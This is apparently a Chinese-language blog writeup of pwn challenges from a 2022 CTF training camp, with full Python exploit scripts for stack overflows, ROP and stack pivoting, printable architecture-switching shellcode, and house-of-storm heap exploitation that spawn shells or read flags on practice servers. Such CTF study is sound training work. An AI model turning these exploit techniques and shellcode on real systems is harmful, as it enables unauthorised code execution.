---
title: 2022 星盟集训 Writeup
date: 2022-07-13 17:54:59 +0800
categories:
  - ctf比赛
tags:
  - pwn
  - ctf
permalink: /posts/id=34/
pin: false
published:
---

## easy_stack

![image-20220713141222336](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220713141222336.png)

题目简单的一个栈溢出，一个puts，考虑栈溢出覆盖返回地址

![image-20220713141050299](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220713141050299.png)

执行到ret时，发现下方存在main函数指针，考虑写个rop跳转到ret main ，但这里开了PIE，且只有一次输入，只能选择尝试改掉原本ret的函数的低位，需要爆破一下

![image-20220713142855298](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220713142855298.png)

用ROPgadget找对应libc_base下的gadget，找一个能让esp+0x18的即可

```bash
ROPgadget --binary libc-2.27.so --offset 0x7f4cd837a000(libc_base) | grep "pop"
```

exp

```python
# _*_ coding:utf-8 _*_
from pwn import *
context(arch='amd64', os='linux')
# context.log_level = 'debug'


elf = ELF("./easy_stack")
libc = ELF('./libc-2.27.so')
# libc = elf.libc

def dbg(con=''):
    gdb.attach(p,con)

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------
# ROPgadget --binary libc-2.27.so --offset 0x7FBC96163000 | grep "pop"

print hex(231+libc.sym['__libc_start_main'])#0x21a87

while True:
	try:
		p = remote("nc.eonew.cn","10004")
		# 0x7fbc96184a87; __libc_start_main+231
		# 0x7FBC96163000
		# 0x00007fbc96185a2f : nop ; add rsp, 8 ; pop rbx ; pop rbp ; ret
		pay = 'a'*0x80+'x'*8+'\x2f\x5a'
		sl(pay)
		libc_base = uu64()-0x22A2f# -231-libc.sym['__libc_start_main']
		lg('libc_base')
		one = libc_base+0x415a6
		sl('a'*0x80+'x'*8+p64(one))
		sl("echo xxx")
		ru('xxx')
		p.interactive()
	except:
		pass
```

![image-20220713155917683](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220713155917683.png)

## no_leak

![image-20220717222241851](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220717222241851.png)

题目很简单，只有一个read存在溢出

利用思路：栈迁移到bss段输入并执行libc_start_main，就会导致bss段上留下了libc的地址，然后再利用magic进行可用地址为system，最后csu1call调用system

![image-20220717222408344](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220717222408344.png)

![image-20220717222329887](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220717222329887.png)

```python
# _*_ coding:utf-8 _*_
from pwn import *
# context.log_level='debug'

p = process("./no_leak")
p = remote("nc.eonew.cn","10002")
elf = ELF("./no_leak")
# libc = ELF("./libc.so.6")
libc = elf.libc

def dbg(con=""):
    gdb.attach(p,con)

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------

# 0x0000000000400518 : add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; ret
magic = 0x0000000000400518

bss = 0x601000+0x400
csu1 = 0x4005B0
csu2 =0x4005CA

start = 0x400450
fini = 0x4005E0
init = 0x400570
main = 0x400537 
read = 0x400549

pay = 'a'*0x80+p64(bss+0x80)+p64(read)
pay = pay.ljust(0x100,'\x00')
p.send(pay)

pay = 'a'*0x88+p64(csu2)
pay += p64(0)+p64(1)+p64(elf.got['__libc_start_main'])+p64(start)+p64(fini)+p64(init)
pay += p64(csu1)
pay = pay.ljust(0x100,'\x00')
p.send(pay)

pay  = 'a'*0x80+p64(bss)+p64(csu2)
pay += p64(0xffffffffffc8e0f8)+p64(0x6013c0+0x3d)+p64(0)*4
pay += p64(magic)+p64(main)
p.send(pay)

pay ='/bin/sh\x00'+'b'*0x80+p64(csu2)
pay += p64(0)+p64(1)+p64(0x6013c0)+p64(0x6012e8)+p64(0)+p64(0)+p64(csu1)
p.send(pay)

p.interactive()
```

```python
from pwn import *
# one = 0x415a6
num = 1
while(True):
        # p = remote("nc.eonew.cn",10002)
        p = process("no_leak")
        p.send('a'*0x80+'a'*8+'\xa6\x15\x04')
        print(num)
        num += 1
        try:    
                p.recv(timeout=0.2)
        except:
                p.close()
                continue
        break
p.interactive()
```

## shellcode

![image-20220717224839548](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220717224839548.png)

![image-20220717224902559](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220717224902559.png)

题目mmp了一片区域，然后执行shellcode，对输入内容有检测，32开始为可见字符，即有不可见字符就exit()

![image-20220717225110721](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220717225110721.png)

白名单沙箱，没有对架构进行检测，考虑切换架构实现open，然后orw

```python
# _*_ coding:utf-8 _*_
from pwn import *
context.log_level = 'debug'
p = process('./shellcode')
# p = remote("nc.eonew.cn","10011")

def dbg():
    gdb.attach(p)
    pause()

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------


append_x86 = '''
push ebx
pop ebx
'''

append = '''
/* 机器码: 52 5a */
push rdx
pop rdx
'''

shellcode_x86 = '''
/*fp = open("flag")*/
mov esp,0x40404140

/* s = "flag" */
push 0x67616c66

/* ebx = &s */
push esp
pop ebx

/* ecx = 0 */
xor ecx,ecx

mov eax,5
int 0x80

mov ecx,eax
'''

shellcode_flag = '''
/* retfq:  mode_32 -> mode_64*/
push 0x33
push 0x40404089
retfq

/*read(fp,buf,0x70)*/
mov rdi,rcx
mov rsi,rsp
mov rdx,0x70
xor rax,rax
syscall

/*write(1,buf,0x70)*/
mov rdi,1
mov rax,1
syscall
'''
shellcode_x86 = asm(shellcode_x86)
shellcode_flag = asm(shellcode_flag, arch = 'amd64', os = 'linux')

# 0x40404040 为32位shellcode地址
shellcode_mmap = '''
/*mmap(0x40404040,0x7e,7,34,0,0)*/
push 0x40404040 /*set rdi*/
pop rdi

push 0x7e /*set rsi*/
pop rsi

push 0x40 /*set rdx*/
pop rax
xor al,0x47
push rax
pop rdx

push 0x40 /*set r8*/
pop rax
xor al,0x40
push rax
pop r8

push rax /*set r9*/
pop r9

/*syscall*/
/* syscall 的机器码是 0f 05, 都是不可打印字符. */
/* 用异或运算来解决这个问题: 0x0f = 0x5d^0x52, 0x05 = 0x5f^0x5a. */
/* 其中 0x52,0x5a 由 append 提供. */
push rbx
pop rax
push 0x5d
pop rcx
xor byte ptr[rax+0x31],cl
push 0x5f
pop rcx
xor byte ptr[rax+0x32],cl

push 0x22 /*set rcx*/
pop rcx

push 0x40/*set rax*/
pop rax
xor al,0x49
'''
shellcode_read = '''
/*read(0,0x40404040,0x70)*/

push 0x40404040 /*set rsi*/
pop rsi

push 0x40 /*set rdi*/
pop rax
xor al,0x40
push rax
pop rdi

xor al,0x40 /*set rdx*/
push 0x70
pop rdx

/*syscall*/
push rbx
pop rax
push 0x5d
pop rcx
xor byte ptr[rax+0x57],cl
push 0x5f
pop rcx
xor byte ptr[rax+0x58],cl

push rdx /*set rax*/
pop rax
xor al,0x70
'''

shellcode_retfq = '''
/*mode_64 -> mode_32*/
push rbx
pop rax

xor al,0x40

push 0x72
pop rcx
xor byte ptr[rax+0x40],cl
push 0x68
pop rcx
xor byte ptr[rax+0x40],cl
push 0x47
pop rcx
sub byte ptr[rax+0x41],cl
push 0x48
pop rcx
sub byte ptr[rax+0x41],cl
push rdi
push rdi
push 0x23
push 0x40404040
pop rax
push rax
'''

shellcode  = shellcode_mmap
shellcode += append
shellcode += shellcode_read
shellcode += append

shellcode += shellcode_retfq
shellcode += append
shellcode = asm(shellcode,arch = 'amd64',os = 'linux')
print hex(len(shellcode))

sla("shellcode: ",shellcode)
sl(shellcode_x86 + 0x29*'\x90' + shellcode_flag)# read 0x70
p.interactive()
```

## house_of_storm

![image-20220718221809838](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220718221809838.png)

标准的house_of_storm范式，这种技巧在2.23下实现任意地址申请，且不需要伪造size头(区别于常见的7fsize头伪造)

```python
# _*_ coding:utf-8 _*_
from pwn import *
context.log_level='debug'

p = process("./house_of_storm")
elf = ELF("./house_of_storm")
libc = elf.libc

def dbg():
    gdb.attach(p)
    pause()

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------

def add(size):
	sla("Your choice?",1)
	sla("What size do you want?",size)

def edit(idx,con):
	sla("Your choice?",3)
	sla("Which one do you want to modify?",idx)
	p.sendlineafter("What do you want to input?",con)

def show(idx):
	sla("Your choice?",4)
	sla('Which one do you want to see?',idx)

def dele(idx):
	sla("Your choice?",2)
	sla("?",idx)


add(0x418)
add(0x20)
add(0x408)
add(0x20)

dele(2)
dele(0)

add(0x418)# 0
dele(0)

show(2)
mainarena = uu64()
libc_base = mainarena-libc.sym['__malloc_hook']-0x10-1096
lg('libc_base')

free_hook = libc_base + 0x3c67a8
one = libc_base + 0xf02a4
free = free_hook-0x10
lg('free')

edit(0,p64(libc_base +0x3c4b78)+p64(free_hook-0x10))
edit(2,p64(mainarena)+p64(free_hook-0x10+8)+p64(0)+p64(free_hook-0x10-0x18-5))

add(0x48)# 5

edit(5,p64(one))

dele(1)

p.interactive()
```

## easy_kernal_pwn1

## 720pwn

![image-20220720131443222](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220720131443222.png)

